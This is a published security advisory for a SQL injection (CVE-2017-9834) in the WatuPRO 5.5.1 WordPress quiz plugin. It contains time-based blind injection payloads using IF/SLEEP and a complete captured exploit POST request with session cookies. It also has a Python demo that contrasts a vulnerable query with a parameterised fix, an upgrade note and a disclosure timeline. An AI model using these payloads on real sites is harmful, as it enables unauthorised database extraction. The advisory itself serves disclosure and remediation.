WordPress Plugin WatuPRO 5.5.1 – SQL Injection

  • Author: Manich Koomsusi
    Date: 2017-07-03
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/42291/
  • #####################################
    Exploit Title: SQL Injection In WatuPRO (WordPress Plugin to Create Exams, Tests and Quizzes)
    Exploit Author: ManichKoomsusi
    Date: 03-07-2017
    Software: WatuPRO
    Version: 5.5.1
    Website: http://calendarscripts.info/watupro/
    Tested on: WordPress 4.7.5
    Software Link: https://1drv.ms/u/s!AhfkvGaDTn1bmgHSj9u_jQX8iME0
    CVE: CVE-2017-9834
    #####################################
    
    Description
    ==================================
    A SQL injection in the WatuPRO WordPress plugin (used to create exams, tests and quizzes) allows an attacker to dump the contents of the site's database.
    
    Vulnerability
    ==================================
    When a quiz is submitted, the plugin passes the “watupro_questions” POST parameter into a SQL statement without sanitising it. The shape of the proof-of-concept payload (a “)” that closes a parenthesised list, an injected condition, then a trailing “(” that the query's own closing parenthesis completes) shows that the value is interpolated verbatim into the query text.
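    The following is an added example, not code from the advisory or from WatuPRO. It models the root cause with a constructed SQLite table: a hypothetical handler that pastes the “quiz:id,id” value straight into an IN (...) list (the list shape is inferred from the payload; the plugin's real query is not shown in the advisory), next to a hardened handler that allow-list validates the value and binds it as parameters. SQLite has no IF()/SLEEP(), so the injected conditions here are boolean rather than time-based, but they keep the same parenthesis shape as the advisory's payload.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for a question table (not WatuPRO's real schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE questions (ID INTEGER PRIMARY KEY, quiz_id INTEGER, question TEXT)")
    db.executemany("INSERT INTO questions VALUES (?, ?, ?)", [
        (1, 1, "quiz 1, question 1"),
        (2, 1, "quiz 1, question 2"),
        (3, 1, "quiz 1, question 3"),
        (4, 2, "quiz 2, question 1"),
    ])
    return db


def split_param(value):
    """Split the 'quiz:id,id' form seen in the PoC ('1:1,2') into its two raw halves."""
    quiz, _, ids = value.partition(":")
    return quiz, ids


def fetch_vulnerable(db, value):
    """Hypothetical vulnerable handler: both halves are pasted into the SQL text.
    The IN (...) shape is an assumption drawn from the PoC payload, which closes a
    parenthesis and leaves a trailing '(' for the query's own ')' to close."""
    quiz, ids = split_param(value)
    sql = f"SELECT ID FROM questions WHERE quiz_id = {quiz} AND ID IN ({ids}) ORDER BY ID"
    return [row[0] for row in db.execute(sql)]


def parse_id_list(ids):
    """Allow-list validation: comma-separated decimal integers and nothing else."""
    if not re.fullmatch(r"\d+(?:,\d+)*", ids):
        raise ValueError(f"rejected watupro_questions id list: {ids!r}")
    return [int(x) for x in ids.split(",")]


def fetch_hardened(db, value):
    """Validated integers are bound as parameters; the IN list gets one '?' per id."""
    quiz, ids = split_param(value)
    if not re.fullmatch(r"\d+", quiz):
        raise ValueError(f"rejected quiz id: {quiz!r}")
    id_list = parse_id_list(ids)
    placeholders = ",".join("?" * len(id_list))
    sql = f"SELECT ID FROM questions WHERE quiz_id = ? AND ID IN ({placeholders}) ORDER BY ID"
    return [row[0] for row in db.execute(sql, [int(quiz), *id_list])]


def hardened_rejects(db, value):
    """True when the hardened path refuses the value instead of querying with it."""
    try:
        fetch_hardened(db, value)
    except ValueError:
        return True
    return False


# Boolean payloads in the same shape as the advisory's time-based one.
TRUE_PAYLOAD = "1:1,2) AND 1=1 AND (1=1"
FALSE_PAYLOAD = "1:1,2) AND 1=0 AND (1=1"

if __name__ == "__main__":
    db = make_db()
    print("normal:", fetch_vulnerable(db, "1:1,2"))
    print("true condition:", fetch_vulnerable(db, TRUE_PAYLOAD))
    print("false condition:", fetch_vulnerable(db, FALSE_PAYLOAD))
    print("hardened rejects payload:", hardened_rejects(db, FALSE_PAYLOAD))
```

    The vulnerable path returns the same rows for a true injected condition as for an honest submission and no rows for a false one, which is exactly the oracle a blind injection needs; the hardened path never lets the value reach the SQL text, so the payload is rejected before any query runs.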
    
    Proof of concept
    ==================================
    Take an exam or quiz and submit it to the server with a POST request (the watupro_submit action on admin-ajax.php, as in the captured request below). The captured request was sent from a logged-in administrator session; the advisory does not state whether the action is reachable without authentication.
    
    Payload : “1:1,2) AND 4761=IF((41=41),SLEEP(5),4761) AND (4547=4547”: the server delays its response by about 5 seconds.
    Payload : “1:1,2) AND 4761=IF((41=41),SLEEP(0),4761) AND (4547=4547”: the server responds without delay.
    The difference between the two response times is the only signal, so this is a time-based blind injection: data is extracted by replacing the constant condition (41=41) with a condition on the data of interest and timing each response.
    
    ############
    POST /pt/wordpress/wp-admin/admin-ajax.php HTTP/1.1
    Content-Length: 292
    Accept-Language: en-US,en;q=0.5
    Host: 192.168.5.189
    Accept: text/plain, */*; q=0.01
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
    DNT: 1
    Connection: close
    X-Requested-With: XMLHttpRequest
    Referer: http://192.168.5.189/pt/wordpress/
    Cookie: wordpress_155e4542aeb2c66021dab6903e684bdb=admin%7C1497811093%7CaY85tN6gH7x8iYCzPETIcEJYYyn6tZlzJnbhTZLgZYX%7C475cf68a551a0db99cd991e958fc949bfe8f2a833bf39d0534ce25d29c11a9b8; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_155e4542aeb2c66021dab6903e684bdb=admin%7C1497811093%7CaY85tN6gH7x8iYCzPETIcEJYYyn6tZlzJnbhTZLgZYX%7C61ef1ea8c998118da9dd01d5f650dc0806f8bfbb1d5f28fdbb626f062bcebbcd; wp-settings-time-1=1497748191; PHPSESSID=rh7v9qt9ibdlioth3cecr5gg94
    Content-Type: application/x-www-form-urlencoded
    
    action=watupro_submit&quiz_id=1&question_id%5B%5D=1&watupro_questions=1:1,2)%20AND%204761%3dIF((41%3d41),SLEEP(5),4761)%20AND%20(4547%3d4547&post_id=5&answer-1%5B%5D=1&question_1_hints=&taker_email=hacker%40admin.com&h_app_id=0.24749700+1497748201&start_time=2017-06-18+01%3A10%3A01&in_ajax=1
    #############
    
    
    Mitigations
    ==================================
    Upgrade to version 5.5.3.7 or later.
    
    Timeline
    ==================================
    2017-06-19: Discovered the bug
    2017-06-19: Reported to vendor
    2017-06-19: First response from the vendor stating the software had been fixed; the fix was incomplete
    2017-06-20: Version 5.5.3.7 released, described as “Fixed issue with input validate.”
    2017-07-03: Advisory published
    
    Discovered By:
    =====================
    ManichKoomsusi